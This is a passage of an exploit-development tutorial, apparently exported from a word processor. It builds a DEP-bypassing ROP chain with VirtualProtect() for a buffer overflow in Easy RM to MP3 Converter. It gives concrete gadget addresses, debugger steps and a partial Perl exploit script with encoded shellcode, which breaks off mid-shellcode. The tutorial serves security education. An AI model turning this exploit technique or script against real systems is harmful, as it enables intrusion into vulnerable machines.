        <w:t>Press F7 once and watch how the jump to VirtualProtect() is made.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3381375" cy="1047750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25" name="Image25" descr="">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a:hlinkClick r:id="rId88"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId87"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3381375" cy="1047750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>As you can see, the function itself is pretty short, and, apart from a few stack interactions, only contains a call to VirtualProtectEx. This function will change the access protection level.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Continue to step through the instructions (F7) until you reach the RETN 10 instruction (at 0x7C801AED).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>At that point, the stack contains this :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4981575" cy="2781300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26" name="Image26" descr="">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a:hlinkClick r:id="rId90"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId89"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4981575" cy="2781300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The ret will make the jump to our shellcode and execute it (if all went well).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Press F9 :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2533650" cy="1933575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27" name="Image27" descr="">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a:hlinkClick r:id="rId92"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId91"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2533650" cy="1933575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This means that the VirtualProtect() technique was successful.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Now it’s time to stop playing &amp; make it generic ( = create the dynamic values at runtime).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="roppery"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r>
        <w:rPr/>
        <w:t>Everybody stay cool, this is a roppery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>If you were hoping for some generic instructions to build a ROP chain, then I have to disappoint you. There is no such thing.  What follows is the result of some creativity, trial &amp; error, some asm facts, and the output of !pvefindaddr rop.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The only thing that might come close to a possible "more or less generic "rop structure (this is just one that has been working well for me) might look something like this :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3448050" cy="5229225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28" name="Image28" descr="">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a:hlinkClick r:id="rId94"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId93"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3448050" cy="5229225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>As you can see, we basically limit the number of instructions (rop gadgets) at the beginning of the chain. We just save the stack pointer and then make a jump (over the Virtualprotect function/parameters), which will make it easier to overwrite the parameter placeholders later on. (Don’t worry – you’ll understand what I mean in a few moments)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The function pointer/parameter placeholders are obviously not rop gadgets, but just static data that is placed on the stack, as part of your buffer. The only thing you will need to do is change/overwrite the placeholders with the dynamically created values, using a rop chain that is located after the placeholders.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>First of all, we will have to change the address that was used to overwrite EIP in our test script. Instead of making a call directly to VirtualProtect(), we now have to return to the stack (so it can pick up a pointer to get the chain started). That means that we need to overwrite EIP with a pointer to RETN.  We’ll use the one that was found earlier : 0x100102DC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Next, we need to think about the possible options to craft our values and put them in the right place on the stack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Pointer to shellcode : one of the easiest ways to do this, is by taking the address of ESP, putting it in a register, and increasing it until it points at the shellcode. There may be other ways, we will really have to look what is at our disposal based on the output in rop.txt </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Size variable : You can either set a register to a start value and increase it until it contains 0x40.  Or you can look for an ADD or SUB instruction on a register which will, when it gets executed, produce 0x40. Of course, you will have to put (POP from the stack) the start value into that register first. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Putting the dynamically generated data back to the stack can be done in various ways as well. You can either put the values, in the right order, in the registers and do a pushad to put them on the stack.  Alternatively you can write to specific locations on the stack using "MOV DWORD PTR DS:[registerA+offset],registerB" instructions. RegisterB must contain the desired value first, of course. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>So it’s clear that you will have to look at rop.txt, your toolbox, and see what approach will work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:ind w:left="567" w:right="567" w:hanging="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>You will obviously need to find instructions that will not mess up the flow or change other registers/values… and if they do, perhaps you can take advantage of that.  The process of building a rop chain is pretty much like solving a Rubik’s [tm] cube.  When you execute one instruction, it might have an impact on other registers/stack locations/….  The goal is to try to take advantage of them (or to avoid them altogether if they would really break the chain)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Anyways, start by creating your rop.txt file.  If you insist on using pointers from application dll’s, then you can create multiple rop files, each targeting a specific module.  But as long as you are hard coding the function pointer to a Windows OS API, using the address from the OS dll itse,f, then it might not make any sense to avoid OS dll’s.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Alternatively, it might be worth while verifying if one of the application dll’s contains the same function call. That would help making the exploit portable and generic. (see "ASLR" later on)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In this example, I will be using VirtualProtect(). The application specific modules that can be used are either the executable itself (not subject to ASLR) and msrmfilter03.dll (not subject to ASLR and will not get rebased either).  So, load both files into IDA free and see if one of these modules contains a call to VirtualProtect(). If that is the case, we might as well try to use a pointer from the application itself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Result : no calls found, so we’ll have to use the address from kernel32.dll</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>All good – let’s get started – for real</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Stage 1 : saving stack pointer and jumping over the parameters</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2 of our VirtualProtect() function parameters need to point at our shellcode.  (Return address and lpAddress).  Since the shellcode is placed on the stack, the easiest way to do this, is by taking the current stack pointer and storing it in a register.  This has 3 advantages :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">you can easily add/sub the value in this register to make it point at your shellcode. ADD, SUB, INC, DEC instructions are pretty common </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">the initial value points is pretty close to the stack address where the pointer to VirtualProtect() is located.  We might be able to take advantage of that at the end of the rop chain, when we need to jump back and call VirtualProtect() </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">this value is also close to the stack location of the parameter placeholders. That might make it easy to use a "mov dword ptr ds:[register+offset],register" instruction to overwrite the parameter placeholder. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Saving the stack pointer can be done in many ways : MOV REG,ESP / PUSH ESP + POP REG, etc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>You will notice that MOV REG,ESP is not a good choice, because it’s very likely that, inside the same gadget, the REG will be popped again, thus overwriting the stack pointer in REG again.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>After doing a quick search in rop.txt, I found this :</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 xml:space="preserve">0x5AD79277 : # PUSH ESP # MOV EAX,EDX # POP EDI # RETN   [Module : uxtheme.dll] </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The stack pointer is pushed to the stack, and picked up in EDI.  That’s nice, but, as you will learn, EDI is not a really popular register in terms of instructions that would do ADD/SUB/… on that register. So it might be a good idea to save the pointer into EAX as well. Furthermore, we might need to have this pointer in 2 registers because we’ll need to change one so it would point to the shellcode, and we might need to use the other one to point it to the location on the stack where the function parameter placeholder is located.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>So, another quick search in rop.txt gives us this :</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 xml:space="preserve">0x77C1E842 :  {POP}  # PUSH EDI # POP EAX # POP EBP # RETN  [Module : msvcrt.dll] </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This will save the same stack pointer into EAX as well.  Pay attention to the POP EBP instruction. We will need to add some padding to compensate for this instruction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Ok, that’s all we need for now.  I really like to avoid writing too much gadgets before the function pointer / parameters, because that might make it harder to overwrite the parameter placeholders.  So what is left now, is jumping over the function block.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The easiest way to do this, is by adding some bytes to ESP, and returning… :</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 xml:space="preserve">0x1001653D :  # ADD ESP,20 # RETN   [Module : MSRMfilter03.dll] </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>So far, our exploit script looks this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 based exploit for Easy RM to MP3 Converter</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#written by corelanc0d3r - http:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="D7DF01"/>
        </w:rPr>
        <w:t>//www.corelan.be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$file= "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>rop.m3u</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$buffersize = 26094;</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$junk = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>Z</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" x $buffersize;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$eip=pack('V',0x100102DC); #return to stack</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$junk2 = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>AAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"; #compensate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#------Put stack pointer in EDI &amp; EAX------------------------#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$rop=pack('V',0x5AD79277);  #PUSH ESP, POP EDI</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 = $rop.pack('V',0x77C1E842); #PUSH EDI, POP EAX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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>AAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"; #compensate for POP EBP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#stack pointer is now in EAX &amp; EDI, now jump over parameters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$rop=$rop.pack('V',0x1001653D);  #ADD ESP,20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#-------Parameters for VirtualProtect()----------------------#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my $params=pack('V',0x7C801AD4);          #VirtualProtect()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WWWW</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">";   #return address (param1)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XXXX</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>";   #lpAddress      (param2)</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YYYY</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">";   #Size           (param3)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ZZZZ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>";   #flNewProtect   (param4)</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$params = $params.pack('V',0x10035005);  #writeable address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$params=$params.("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" x 8);  #padding</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ADD ESP,20 + RET will land here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$rop2 = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>JJJJ</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$nops = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>\x90</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" x 240;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./msfpayload windows/messagebox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TITLE=CORELAN TEXT="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>rop test by corelanc0d3r</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">" R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 ./msfencode -e x86/alpha_mixed -t perl</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my $shellcode =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\x89\xe0\xda\xcf\xd9\x70\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a</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\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59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\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41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\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42</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\x75\x4a\x49\x48\x59\x48\x6b\x4f\x6b\x48\x59\x43\x44\x51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\x34\x4c\x34\x50\x31\x48\x52\x4f\x42\x42\x5a\x46\x51\x49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\x59\x45\x34\x4e\x6b\x51\x61\x44\x70\x4e\x6b\x43\x46\x46</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\x6c\x4c\x4b\x42\x56\x45\x4c\x4c\x4b\x42\x66\x43\x38\x4c</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\x4b\x51\x6e\x45\x70\x4e\x6b\x50\x36\x44\x78\x42\x6f\x45</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\x48\x44\x35\x4c\x33\x50\x59\x43\x31\x4a\x71\x4b\x4f\x48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\x61\x43\x50\x4c\x4b\x50\x6c\x51\x34\x46\x44\x4e\x6b\x47</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\x35\x45\x6c\x4c\x4b\x42\x74\x43\x35\x42\x58\x46\x61\x48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\x6a\x4e\x6b\x51\x5a\x45\x48\x4e\x6b\x42\x7a\x47\x50\x47</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\x71\x48\x6b\x4a\x43\x45\x67\x42\x69\x4e\x6b\x47\x44\x4e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\x6b\x46\x61\x48\x6e\x46\x51\x49\x6f\x45\x61\x49\x50\x49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\x6c\x4e\x4c\x4d\x54\x49\x50\x50\x74\x45\x5a\x4b\x71\x48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\x4f\x44\x4d\x47\x71\x4b\x77\x48\x69\x48\x71\x49\x6f\x49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\x6f\x4b\x4f\x45\x6b\x43\x4c\x47\x54\x44\x68\x51\x65\x49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\x4e\x4e\x6b\x50\x5a\x45\x74\x46\x61\x48\x6b\x50\x66\x4e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\x6b\x46\x6c\x50\x4b\x4c\x4b\x51\x4a\x45\x4c\x45\x51\x4a</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\x4b\x4e\x6b\x43\x34\x4c\x4b\x43\x31\x4a\x48\x4d\x59\x42</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\x64\x51\x34\x47\x6c\x45\x31\x4f\x33\x4f\x42\x47\x78\x44</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\x69\x49\x44\x4f\x79\x4a\x45\x4e\x69\x4a\x62\x43\x58\x4e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\x6e\x42\x6e\x44\x4e\x48\x6c\x43\x62\x4a\x48\x4d\x4c\x4b</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\x4f\x4b\x4f\x49\x6f\x4d\x59\x42\x65\x43\x34\x4f\x4b\x51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\x6e\x48\x58\x48\x62\x43\x43\x4e\x67\x47\x6c\x45\x74\x43</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\x62\x49\x78\x4e\x6b\x4b\x4f\x4b\x4f\x49\x6f\x4f\x79\x50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\x45\x45\x58\x42\x48\x50\x6c\x42\x4c\x51\x